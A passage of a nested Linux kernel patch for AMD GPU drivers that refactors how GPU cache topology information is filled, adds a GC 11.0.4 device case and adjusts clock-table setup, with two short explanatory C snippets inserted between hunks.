+- *	@size_filled - [OUT] amount of data used up in pcache.
+- *	@num_of_entries - [OUT] number of caches added
+- */
+-static int kfd_fill_gpu_cache_info(struct kfd_dev *kdev,
+-			int gpu_processor_id,
+-			int available_size,
+-			struct kfd_cu_info *cu_info,
+-			struct crat_subtype_cache *pcache,
+-			int *size_filled,
+-			int *num_of_entries)
++int kfd_get_gpu_cache_info(struct kfd_dev *kdev, struct kfd_gpu_cache_info **pcache_info)
+ {
+-	struct kfd_gpu_cache_info *pcache_info;
+-	struct kfd_gpu_cache_info cache_info[KFD_MAX_CACHE_TYPES];
+ 	int num_of_cache_types = 0;
+-	int i, j, k;
+-	int ct = 0;
+-	int mem_available = available_size;
+-	unsigned int cu_processor_id;
+-	int ret;
+-	unsigned int num_cu_shared;
+ 
+ 	switch (kdev->adev->asic_type) {
+ 	case CHIP_KAVERI:
+-		pcache_info = kaveri_cache_info;
++		*pcache_info = kaveri_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(kaveri_cache_info);
+ 		break;
+ 	case CHIP_HAWAII:
+-		pcache_info = hawaii_cache_info;
++		*pcache_info = hawaii_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(hawaii_cache_info);
+ 		break;
+ 	case CHIP_CARRIZO:
+-		pcache_info = carrizo_cache_info;
++		*pcache_info = carrizo_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(carrizo_cache_info);
+ 		break;
+ 	case CHIP_TONGA:
+-		pcache_info = tonga_cache_info;
++		*pcache_info = tonga_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(tonga_cache_info);
+ 		break;
+ 	case CHIP_FIJI:
+-		pcache_info = fiji_cache_info;
++		*pcache_info = fiji_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(fiji_cache_info);
+ 		break;
+ 	case CHIP_POLARIS10:
+-		pcache_info = polaris10_cache_info;
++		*pcache_info = polaris10_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(polaris10_cache_info);
+ 		break;
+ 	case CHIP_POLARIS11:
+-		pcache_info = polaris11_cache_info;
++		*pcache_info = polaris11_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(polaris11_cache_info);
+ 		break;
+ 	case CHIP_POLARIS12:
+-		pcache_info = polaris12_cache_info;
++		*pcache_info = polaris12_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(polaris12_cache_info);
+ 		break;
+ 	case CHIP_VEGAM:
+-		pcache_info = vegam_cache_info;
++		*pcache_info = vegam_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(vegam_cache_info);
+ 		break;
+ 	default:
+ 		switch (KFD_GC_VERSION(kdev)) {
+ 		case IP_VERSION(9, 0, 1):
+-			pcache_info = vega10_cache_info;
++			*pcache_info = vega10_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(vega10_cache_info);
+ 			break;
+ 		case IP_VERSION(9, 2, 1):
+-			pcache_info = vega12_cache_info;
++			*pcache_info = vega12_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(vega12_cache_info);
+ 			break;
+ 		case IP_VERSION(9, 4, 0):
+ 		case IP_VERSION(9, 4, 1):
+-			pcache_info = vega20_cache_info;
++			*pcache_info = vega20_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(vega20_cache_info);
+ 			break;
+ 		case IP_VERSION(9, 4, 2):
+-			pcache_info = aldebaran_cache_info;
++			*pcache_info = aldebaran_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(aldebaran_cache_info);
+ 			break;
+ 		case IP_VERSION(9, 1, 0):
+ 		case IP_VERSION(9, 2, 2):
+-			pcache_info = raven_cache_info;
++			*pcache_info = raven_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(raven_cache_info);
+ 			break;
+ 		case IP_VERSION(9, 3, 0):
+-			pcache_info = renoir_cache_info;
++			*pcache_info = renoir_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(renoir_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 1, 10):
+ 		case IP_VERSION(10, 1, 2):
+ 		case IP_VERSION(10, 1, 3):
+ 		case IP_VERSION(10, 1, 4):
+-			pcache_info = navi10_cache_info;
++			*pcache_info = navi10_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(navi10_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 1, 1):
+-			pcache_info = navi14_cache_info;
++			*pcache_info = navi14_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(navi14_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 0):
+-			pcache_info = sienna_cichlid_cache_info;
++			*pcache_info = sienna_cichlid_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(sienna_cichlid_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 2):
+-			pcache_info = navy_flounder_cache_info;
++			*pcache_info = navy_flounder_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(navy_flounder_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 4):
+-			pcache_info = dimgrey_cavefish_cache_info;
++			*pcache_info = dimgrey_cavefish_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(dimgrey_cavefish_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 1):
+-			pcache_info = vangogh_cache_info;
++			*pcache_info = vangogh_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(vangogh_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 5):
+-			pcache_info = beige_goby_cache_info;
++			*pcache_info = beige_goby_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(beige_goby_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 3):
+-			pcache_info = yellow_carp_cache_info;
++			*pcache_info = yellow_carp_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(yellow_carp_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 6):
+-			pcache_info = gc_10_3_6_cache_info;
++			*pcache_info = gc_10_3_6_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(gc_10_3_6_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 7):
+-			pcache_info = gfx1037_cache_info;
++			*pcache_info = gfx1037_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(gfx1037_cache_info);
+ 			break;
+ 		case IP_VERSION(11, 0, 0):
+ 		case IP_VERSION(11, 0, 1):
+ 		case IP_VERSION(11, 0, 2):
+ 		case IP_VERSION(11, 0, 3):
+-			pcache_info = cache_info;
++		case IP_VERSION(11, 0, 4):
+ 			num_of_cache_types =
+-				kfd_fill_gpu_cache_info_from_gfx_config(kdev, pcache_info);
++				kfd_fill_gpu_cache_info_from_gfx_config(kdev, *pcache_info);
+ 			break;
+ 		default:
+-			return -EINVAL;
+-		}
+-	}
+-
+-	*size_filled = 0;
+-	*num_of_entries = 0;
+-
+-	/* For each type of cache listed in the kfd_gpu_cache_info table,
+-	 * go through all available Compute Units.
+-	 * The [i,j,k] loop will
+-	 *		if kfd_gpu_cache_info.num_cu_shared = 1
+-	 *			will parse through all available CU
+-	 *		If (kfd_gpu_cache_info.num_cu_shared != 1)
+-	 *			then it will consider only one CU from
+-	 *			the shared unit
+-	 */
+-
+-	for (ct = 0; ct < num_of_cache_types; ct++) {
+-	  cu_processor_id = gpu_processor_id;
+-	  if (pcache_info[ct].cache_level == 1) {
+-	    for (i = 0; i < cu_info->num_shader_engines; i++) {
+-	      for (j = 0; j < cu_info->num_shader_arrays_per_engine; j++) {
+-	        for (k = 0; k < cu_info->num_cu_per_sh;
+-		  k += pcache_info[ct].num_cu_shared) {
+-		  ret = fill_in_l1_pcache(pcache,
+-					pcache_info,
+-					cu_info,
+-					mem_available,
+-					cu_info->cu_bitmap[i % 4][j + i / 4],
+-					ct,
+-					cu_processor_id,
+-					k);
+-
+-		  if (ret < 0)
++			*pcache_info = dummy_cache_info;
++			num_of_cache_types = ARRAY_SIZE(dummy_cache_info);
++			pr_warn("dummy cache info is used temporarily; real cache info needs to be updated later.\n");
+ 			break;
+-
+-		  if (!ret) {
+-				pcache++;
+-				(*num_of_entries)++;
+-				mem_available -= sizeof(*pcache);
+-				(*size_filled) += sizeof(*pcache);
+-		  }
+-
+-		  /* Move to next CU block */
+-		  num_cu_shared = ((k + pcache_info[ct].num_cu_shared) <=
+-					cu_info->num_cu_per_sh) ?
+-					pcache_info[ct].num_cu_shared :
+-					(cu_info->num_cu_per_sh - k);
+-		  cu_processor_id += num_cu_shared;
+ 		}
+-	      }
+-	    }
+-	  } else {
+-			ret = fill_in_l2_l3_pcache(pcache,
+-				pcache_info,
+-				cu_info,
+-				mem_available,
+-				ct,
+-				cu_processor_id);
+-
+-			if (ret < 0)
+-				break;
+-
+-			if (!ret) {
+-				pcache++;
+-				(*num_of_entries)++;
+-				mem_available -= sizeof(*pcache);
+-				(*size_filled) += sizeof(*pcache);
+-			}
+-	  }
+ 	}
+-
+-	pr_debug("Added [%d] GPU cache entries\n", *num_of_entries);
+-
+-	return 0;
++	return num_of_cache_types;
+ }
+ 
+ static bool kfd_ignore_crat(void)
+@@ -2263,8 +2092,6 @@ static int kfd_create_vcrat_image_gpu(void *pcrat_image,
+ 	struct kfd_cu_info cu_info;
+ 	int avail_size = *size;
+ 	uint32_t total_num_of_cu;
+-	int num_of_cache_entries = 0;
+-	int cache_mem_filled = 0;
+ 	uint32_t nid = 0;
+ 	int ret = 0;
+ 
+@@ -2365,31 +2192,12 @@ static int kfd_create_vcrat_image_gpu(void *pcrat_image,
+ 	crat_table->length += sizeof(struct crat_subtype_memory);
+ 	crat_table->total_entries++;
+ 
+-	/* TODO: Fill in cache information. This information is NOT readily
+-	 * available in KGD
+-	 */
+-	sub_type_hdr = (typeof(sub_type_hdr))((char *)sub_type_hdr +
+-		sub_type_hdr->length);
+-	ret = kfd_fill_gpu_cache_info(kdev, cu->processor_id_low,
+-				avail_size,
+-				&cu_info,
+-				(struct crat_subtype_cache *)sub_type_hdr,
+-				&cache_mem_filled,
+-				&num_of_cache_entries);
+-
+-	if (ret < 0)
+-		return ret;
+-
+-	crat_table->length += cache_mem_filled;
+-	crat_table->total_entries += num_of_cache_entries;
+-	avail_size -= cache_mem_filled;
+-
+ 	/* Fill in Subtype: IO_LINKS
+ 	 *  Only direct links are added here which is Link from GPU to
+ 	 *  its NUMA node. Indirect links are added by userspace.
+ 	 */
+ 	sub_type_hdr = (typeof(sub_type_hdr))((char *)sub_type_hdr +
+-		cache_mem_filled);
++		sub_type_hdr->length);
+ 	ret = kfd_fill_gpu_direct_io_link_to_cpu(&avail_size, kdev,
+ 		(struct crat_subtype_iolink *)sub_type_hdr, proximity_domain);
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_crat.h b/drivers/gpu/drm/amd/amdkfd/kfd_crat.h
+index 482ba84a728d1..a8671061a175a 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_crat.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_crat.h
+@@ -317,6 +317,18 @@ struct cdit_header {
+ 
+ struct kfd_dev;
+ 
++/* Static table to describe GPU Cache information */
++struct kfd_gpu_cache_info {
++	uint32_t	cache_size;
++	uint32_t	cache_level;
++	uint32_t	flags;
++	/* Indicates how many Compute Units share this cache
++	 * within a SA. Value = 1 indicates the cache is not shared
++	 */
++	uint32_t	num_cu_shared;
++};
++int kfd_get_gpu_cache_info(struct kfd_dev *kdev, struct kfd_gpu_cache_info **pcache_info);
++
+ int kfd_create_crat_image_acpi(void **crat_image, size_t *size);
+ void kfd_destroy_crat_image(void *crat_image);
+ int kfd_parse_crat_table(void *crat_image, struct list_head *device_list,
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_device.c b/drivers/gpu/drm/amd/amdkfd/kfd_device.c
+index a75e1af77365d..27820f0a282d1 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_device.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_device.c
+@@ -154,6 +154,7 @@ static void kfd_device_info_set_event_interrupt_class(struct kfd_dev *kfd)
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 		kfd->device_info.event_interrupt_class = &event_interrupt_class_v11;
+ 		break;
+ 	default:
+@@ -396,6 +397,7 @@ struct kfd_dev *kgd2kfd_probe(struct amdgpu_device *adev, bool vf)
+ 			f2g = &gfx_v11_kfd2kgd;
+ 			break;
+ 		case IP_VERSION(11, 0, 1):
++		case IP_VERSION(11, 0, 4):
+ 			gfx_target_version = 110003;
+ 			f2g = &gfx_v11_kfd2kgd;
+ 			break;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+index 35a9b702508af..713f893d25302 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+@@ -364,7 +364,6 @@ static ssize_t kfd_cache_show(struct kobject *kobj, struct attribute *attr,
+ 
+ 	/* Making sure that the buffer is an empty string */
+ 	buffer[0] = 0;
+-
+ 	cache = container_of(attr, struct kfd_cache_properties, attr);
+ 	if (cache->gpu && kfd_devcgroup_check_permission(cache->gpu))
+ 		return -EPERM;
+@@ -379,12 +378,13 @@ static ssize_t kfd_cache_show(struct kobject *kobj, struct attribute *attr,
+ 	sysfs_show_32bit_prop(buffer, offs, "association", cache->cache_assoc);
+ 	sysfs_show_32bit_prop(buffer, offs, "latency", cache->cache_latency);
+ 	sysfs_show_32bit_prop(buffer, offs, "type", cache->cache_type);
++
+ 	offs += snprintf(buffer+offs, PAGE_SIZE-offs, "sibling_map ");
+-	for (i = 0; i < CRAT_SIBLINGMAP_SIZE; i++)
++	for (i = 0; i < cache->sibling_map_size; i++)
+ 		for (j = 0; j < sizeof(cache->sibling_map[0])*8; j++)
+ 			/* Check each bit */
+ 			offs += snprintf(buffer+offs, PAGE_SIZE-offs, "%d,",
+-					 (cache->sibling_map[i] >> j) & 1);
++						(cache->sibling_map[i] >> j) & 1);
+ 
+ 	/* Replace the last "," with end of line */
+ 	buffer[offs-1] = '\n';
+@@ -1198,7 +1198,6 @@ static struct kfd_topology_device *kfd_assign_gpu(struct kfd_dev *gpu)
+ 	struct kfd_iolink_properties *iolink;
+ 	struct kfd_iolink_properties *p2plink;
+ 
+-	down_write(&topology_lock);
+ 	list_for_each_entry(dev, &topology_device_list, list) {
+ 		/* Discrete GPUs need their own topology device list
+ 		 * entries. Don't assign them to CPU/APU nodes.
+@@ -1222,7 +1221,6 @@ static struct kfd_topology_device *kfd_assign_gpu(struct kfd_dev *gpu)
+ 			break;
+ 		}
+ 	}
+-	up_write(&topology_lock);
+ 	return out_dev;
+ }
+ 
+@@ -1593,6 +1591,221 @@ out:
+ 	return ret;
+ }
+ 
++
++/* Helper function. See kfd_fill_gpu_cache_info for parameter description */
++static int fill_in_l1_pcache(struct kfd_cache_properties **props_ext,
++				struct kfd_gpu_cache_info *pcache_info,
++				struct kfd_cu_info *cu_info,
++				int cu_bitmask,
++				int cache_type, unsigned int cu_processor_id,
++				int cu_block)
++{
++	unsigned int cu_sibling_map_mask;
++	int first_active_cu;
++	struct kfd_cache_properties *pcache = NULL;
++
++	cu_sibling_map_mask = cu_bitmask;
++	cu_sibling_map_mask >>= cu_block;
++	cu_sibling_map_mask &= ((1 << pcache_info[cache_type].num_cu_shared) - 1);
++	first_active_cu = ffs(cu_sibling_map_mask);
++
++	/* The CU could be inactive. For a shared cache, find the first
++	 * active CU; for a non-shared cache, check whether the CU is
++	 * inactive and, if so, skip it.
++	 */
++	if (first_active_cu) {
++		pcache = kfd_alloc_struct(pcache);
++		if (!pcache)
++			return -ENOMEM;
++
++		memset(pcache, 0, sizeof(struct kfd_cache_properties));
++		pcache->processor_id_low = cu_processor_id + (first_active_cu - 1);
++		pcache->cache_level = pcache_info[cache_type].cache_level;
++		pcache->cache_size = pcache_info[cache_type].cache_size;
++
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_DATA_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_DATA;
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_INST_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_INSTRUCTION;
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_CPU_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_CPU;
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_SIMD_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_HSACU;
++
++		/* Sibling map is w.r.t processor_id_low, so shift out
++		 * inactive CU
++		 */
++		cu_sibling_map_mask =
++			cu_sibling_map_mask >> (first_active_cu - 1);
++
++		pcache->sibling_map[0] = (uint8_t)(cu_sibling_map_mask & 0xFF);
++		pcache->sibling_map[1] =
++				(uint8_t)((cu_sibling_map_mask >> 8) & 0xFF);
++		pcache->sibling_map[2] =
++				(uint8_t)((cu_sibling_map_mask >> 16) & 0xFF);
++		pcache->sibling_map[3] =
++				(uint8_t)((cu_sibling_map_mask >> 24) & 0xFF);
++
++		pcache->sibling_map_size = 4;
++		*props_ext = pcache;
++
++		return 0;
++	}
++	return 1;
++}
++
++/* Helper function. See kfd_fill_gpu_cache_info for parameter description */
++static int fill_in_l2_l3_pcache(struct kfd_cache_properties **props_ext,
++				struct kfd_gpu_cache_info *pcache_info,
++				struct kfd_cu_info *cu_info,
++				int cache_type, unsigned int cu_processor_id)
++{
++	unsigned int cu_sibling_map_mask;
++	int first_active_cu;
++	int i, j, k;
++	struct kfd_cache_properties *pcache = NULL;
++
++	cu_sibling_map_mask = cu_info->cu_bitmap[0][0];
++	cu_sibling_map_mask &=
++		((1 << pcache_info[cache_type].num_cu_shared) - 1);
++	first_active_cu = ffs(cu_sibling_map_mask);
++
++	/* The CU could be inactive. For a shared cache, find the first
++	 * active CU; for a non-shared cache, check whether the CU is
++	 * inactive and, if so, skip it.
++	 */
++	if (first_active_cu) {
++		pcache = kfd_alloc_struct(pcache);
++		if (!pcache)
++			return -ENOMEM;
++
++		memset(pcache, 0, sizeof(struct kfd_cache_properties));
++		pcache->processor_id_low = cu_processor_id
++					+ (first_active_cu - 1);
++		pcache->cache_level = pcache_info[cache_type].cache_level;
++		pcache->cache_size = pcache_info[cache_type].cache_size;
++
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_DATA_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_DATA;
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_INST_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_INSTRUCTION;
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_CPU_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_CPU;
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_SIMD_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_HSACU;
++
++		/* Sibling map is w.r.t processor_id_low, so shift out
++		 * inactive CU
++		 */
++		cu_sibling_map_mask = cu_sibling_map_mask >> (first_active_cu - 1);
++		k = 0;
++
++		for (i = 0; i < cu_info->num_shader_engines; i++) {
++			for (j = 0; j < cu_info->num_shader_arrays_per_engine; j++) {
++				pcache->sibling_map[k] = (uint8_t)(cu_sibling_map_mask & 0xFF);
++				pcache->sibling_map[k+1] = (uint8_t)((cu_sibling_map_mask >> 8) & 0xFF);
++				pcache->sibling_map[k+2] = (uint8_t)((cu_sibling_map_mask >> 16) & 0xFF);
++				pcache->sibling_map[k+3] = (uint8_t)((cu_sibling_map_mask >> 24) & 0xFF);
++				k += 4;
++
++				cu_sibling_map_mask = cu_info->cu_bitmap[i % 4][j + i / 4];
++				cu_sibling_map_mask &= ((1 << pcache_info[cache_type].num_cu_shared) - 1);
++			}
++		}
++		pcache->sibling_map_size = k;
++		*props_ext = pcache;
++		return 0;
++	}
++	return 1;
++}
++
++#define KFD_MAX_CACHE_TYPES 6
++
++/* kfd_fill_cache_non_crat_info - Fill GPU cache info using kfd_gpu_cache_info
++ * tables
++ */
++void kfd_fill_cache_non_crat_info(struct kfd_topology_device *dev, struct kfd_dev *kdev)
++{
++	struct kfd_gpu_cache_info *pcache_info = NULL;
++	int i, j, k;
++	int ct = 0;
++	unsigned int cu_processor_id;
++	int ret;
++	unsigned int num_cu_shared;
++	struct kfd_cu_info cu_info;
++	struct kfd_cu_info *pcu_info;
++	int gpu_processor_id;
++	struct kfd_cache_properties *props_ext;
++	int num_of_entries = 0;
++	int num_of_cache_types = 0;
++	struct kfd_gpu_cache_info cache_info[KFD_MAX_CACHE_TYPES];
++
++	amdgpu_amdkfd_get_cu_info(kdev->adev, &cu_info);
++	pcu_info = &cu_info;
++
++	gpu_processor_id = dev->node_props.simd_id_base;
++
++	pcache_info = cache_info;
++	num_of_cache_types = kfd_get_gpu_cache_info(kdev, &pcache_info);
++	if (!num_of_cache_types) {
++		pr_warn("no cache info found\n");
++		return;
++	}
++
++	/* For each type of cache listed in the kfd_gpu_cache_info table,
++	 * go through all available Compute Units.
++	 * The [i,j,k] loop:
++	 *		if kfd_gpu_cache_info.num_cu_shared == 1,
++	 *			it parses through all available CUs;
++	 *		if kfd_gpu_cache_info.num_cu_shared != 1,
++	 *			it considers only one CU from
++	 *			the shared unit.
++	 */
++	for (ct = 0; ct < num_of_cache_types; ct++) {
++		cu_processor_id = gpu_processor_id;
++		if (pcache_info[ct].cache_level == 1) {
++			for (i = 0; i < pcu_info->num_shader_engines; i++) {
++				for (j = 0; j < pcu_info->num_shader_arrays_per_engine; j++) {
++					for (k = 0; k < pcu_info->num_cu_per_sh; k += pcache_info[ct].num_cu_shared) {
++
++						ret = fill_in_l1_pcache(&props_ext, pcache_info, pcu_info,
++										pcu_info->cu_bitmap[i % 4][j + i / 4], ct,
++										cu_processor_id, k);
++
++						if (ret < 0)
++							break;
++
++						if (!ret) {
++							num_of_entries++;
++							list_add_tail(&props_ext->list, &dev->cache_props);
++						}
++
++						/* Move to next CU block */
++						num_cu_shared = ((k + pcache_info[ct].num_cu_shared) <=
++							pcu_info->num_cu_per_sh) ?
++							pcache_info[ct].num_cu_shared :
++							(pcu_info->num_cu_per_sh - k);
++						cu_processor_id += num_cu_shared;
++					}
++				}
++			}
++		} else {
++			ret = fill_in_l2_l3_pcache(&props_ext, pcache_info,
++								pcu_info, ct, cu_processor_id);
++
++			if (ret < 0)
++				break;
++
++			if (!ret) {
++				num_of_entries++;
++				list_add_tail(&props_ext->list, &dev->cache_props);
++			}
++		}
++	}
++	dev->node_props.caches_count += num_of_entries;
++	pr_debug("Added [%d] GPU cache entries\n", num_of_entries);
++}
++
+ int kfd_topology_add_device(struct kfd_dev *gpu)
+ {
+ 	uint32_t gpu_id;
+@@ -1617,9 +1830,9 @@ int kfd_topology_add_device(struct kfd_dev *gpu)
+ 	 * CRAT to create a new topology device. Once created assign the gpu to
+ 	 * that topology device
+ 	 */
++	down_write(&topology_lock);
+ 	dev = kfd_assign_gpu(gpu);
+ 	if (!dev) {
+-		down_write(&topology_lock);
+ 		proximity_domain = ++topology_crat_proximity_domain;
+ 
+ 		res = kfd_create_crat_image_virtual(&crat_image, &image_size,
+@@ -1631,6 +1844,7 @@ int kfd_topology_add_device(struct kfd_dev *gpu)
+ 			topology_crat_proximity_domain--;
+ 			return res;
+ 		}
++
+ 		res = kfd_parse_crat_table(crat_image,
+ 					   &temp_topology_device_list,
+ 					   proximity_domain);
+@@ -1644,23 +1858,28 @@ int kfd_topology_add_device(struct kfd_dev *gpu)
+ 		kfd_topology_update_device_list(&temp_topology_device_list,
+ 			&topology_device_list);
+ 
++		dev = kfd_assign_gpu(gpu);
++		if (WARN_ON(!dev)) {
++			res = -ENODEV;
++			goto err;
++		}
++
++		/* Fill the cache affinity information here for the GPUs
++		 * using VCRAT
++		 */
++		kfd_fill_cache_non_crat_info(dev, gpu);
++
+ 		/* Update the SYSFS tree, since we added another topology
+ 		 * device
+ 		 */
+ 		res = kfd_topology_update_sysfs();
+-		up_write(&topology_lock);
+-
+ 		if (!res)
+ 			sys_props.generation_count++;
+ 		else
+ 			pr_err("Failed to update GPU (ID: 0x%x) to sysfs topology. res=%d\n",
+ 						gpu_id, res);
+-		dev = kfd_assign_gpu(gpu);
+-		if (WARN_ON(!dev)) {
+-			res = -ENODEV;
+-			goto err;
+-		}
+ 	}
++	up_write(&topology_lock);
+ 
+ 	dev->gpu_id = gpu_id;
+ 	gpu->id = gpu_id;
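Both fill_in_*_pcache helpers above build sibling_map[] the same way: shift the CU bitmask so bit 0 is the first active CU, then split it into bytes. A runnable sketch with an invented mask:

#include <stdio.h>
#include <stdint.h>
#include <strings.h>

int main(void)
{
	uint32_t mask = 0xB0;	/* CUs 4, 5 and 7 share this cache */
	int first = ffs(mask);	/* 1-based index of the first set bit */
	uint8_t sibling_map[4];

	mask >>= first - 1;	/* make the map relative to the first active CU */
	for (int i = 0; i < 4; i++)
		sibling_map[i] = (mask >> (8 * i)) & 0xFF;

	printf("first active CU: %d, sibling_map[0] = %#x\n",
	       first - 1, sibling_map[0]);
	return 0;
}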
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.h b/drivers/gpu/drm/amd/amdkfd/kfd_topology.h
+index 9f6c949186c19..19283b8b16884 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.h
+@@ -80,6 +80,8 @@ struct kfd_mem_properties {
+ 	struct attribute	attr;
+ };
+ 
++#define CACHE_SIBLINGMAP_SIZE 64
++
+ struct kfd_cache_properties {
+ 	struct list_head	list;
+ 	uint32_t		processor_id_low;
+@@ -90,10 +92,11 @@ struct kfd_cache_properties {
+ 	uint32_t		cache_assoc;
+ 	uint32_t		cache_latency;
+ 	uint32_t		cache_type;
+-	uint8_t			sibling_map[CRAT_SIBLINGMAP_SIZE];
++	uint8_t			sibling_map[CACHE_SIBLINGMAP_SIZE];
+ 	struct kfd_dev		*gpu;
+ 	struct kobject		*kobj;
+ 	struct attribute	attr;
++	uint32_t		sibling_map_size;
+ };
+ 
+ struct kfd_iolink_properties {
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c
+index 24715ca2fa944..01383aac6b419 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c
+@@ -529,6 +529,19 @@ static struct clk_bw_params vg_bw_params = {
+ 
+ };
+ 
++static uint32_t find_max_clk_value(const uint32_t clocks[], uint32_t num_clocks)
++{
++	uint32_t max = 0;
++	int i;
++
++	for (i = 0; i < num_clocks; ++i) {
++		if (clocks[i] > max)
++			max = clocks[i];
++	}
++
++	return max;
++}
++
+ static unsigned int find_dcfclk_for_voltage(const struct vg_dpm_clocks *clock_table,
+ 		unsigned int voltage)
+ {
+@@ -572,12 +585,16 @@ static void vg_clk_mgr_helper_populate_bw_params(
+ 
+ 	bw_params->clk_table.num_entries = j + 1;
+ 
+-	for (i = 0; i < bw_params->clk_table.num_entries; i++, j--) {
++	for (i = 0; i < bw_params->clk_table.num_entries - 1; i++, j--) {
+ 		bw_params->clk_table.entries[i].fclk_mhz = clock_table->DfPstateTable[j].fclk;
+ 		bw_params->clk_table.entries[i].memclk_mhz = clock_table->DfPstateTable[j].memclk;
+ 		bw_params->clk_table.entries[i].voltage = clock_table->DfPstateTable[j].voltage;
+ 		bw_params->clk_table.entries[i].dcfclk_mhz = find_dcfclk_for_voltage(clock_table, clock_table->DfPstateTable[j].voltage);
+ 	}
++	bw_params->clk_table.entries[i].fclk_mhz = clock_table->DfPstateTable[j].fclk;
++	bw_params->clk_table.entries[i].memclk_mhz = clock_table->DfPstateTable[j].memclk;
++	bw_params->clk_table.entries[i].voltage = clock_table->DfPstateTable[j].voltage;
++	bw_params->clk_table.entries[i].dcfclk_mhz = find_max_clk_value(clock_table->DcfClocks, VG_NUM_DCFCLK_DPM_LEVELS);
+ 
+ 	bw_params->vram_type = bios_info->memory_type;
+ 	bw_params->num_channels = bios_info->ma_channel_number;
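The reworked loop stops one entry early so the last (highest-voltage) entry can take the maximum DCFCLK from the SMU table instead of a per-voltage lookup. The helper reduces to this (sample clock values invented):

#include <stdio.h>
#include <stdint.h>

static uint32_t find_max_clk_value(const uint32_t clocks[], uint32_t num_clocks)
{
	uint32_t max = 0;

	for (uint32_t i = 0; i < num_clocks; i++)
		if (clocks[i] > max)
			max = clocks[i];
	return max;
}

int main(void)
{
	uint32_t dcfclks[] = { 400, 600, 0, 0 };	/* sparse SMU table */

	printf("top entry dcfclk: %u MHz\n", find_max_clk_value(dcfclks, 4));
	return 0;
}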
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index 328c5e33cc66b..bf7fcd268cb47 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -1016,6 +1016,7 @@ static bool detect_link_and_local_sink(struct dc_link *link,
+ 	struct dc_sink *prev_sink = NULL;
+ 	struct dpcd_caps prev_dpcd_caps;
+ 	enum dc_connection_type new_connection_type = dc_connection_none;
++	enum dc_connection_type pre_connection_type = link->type;
+ 	const uint32_t post_oui_delay = 30; // 30ms
+ 
+ 	DC_LOGGER_INIT(link->ctx->logger);
+@@ -1118,6 +1119,8 @@ static bool detect_link_and_local_sink(struct dc_link *link,
+ 			}
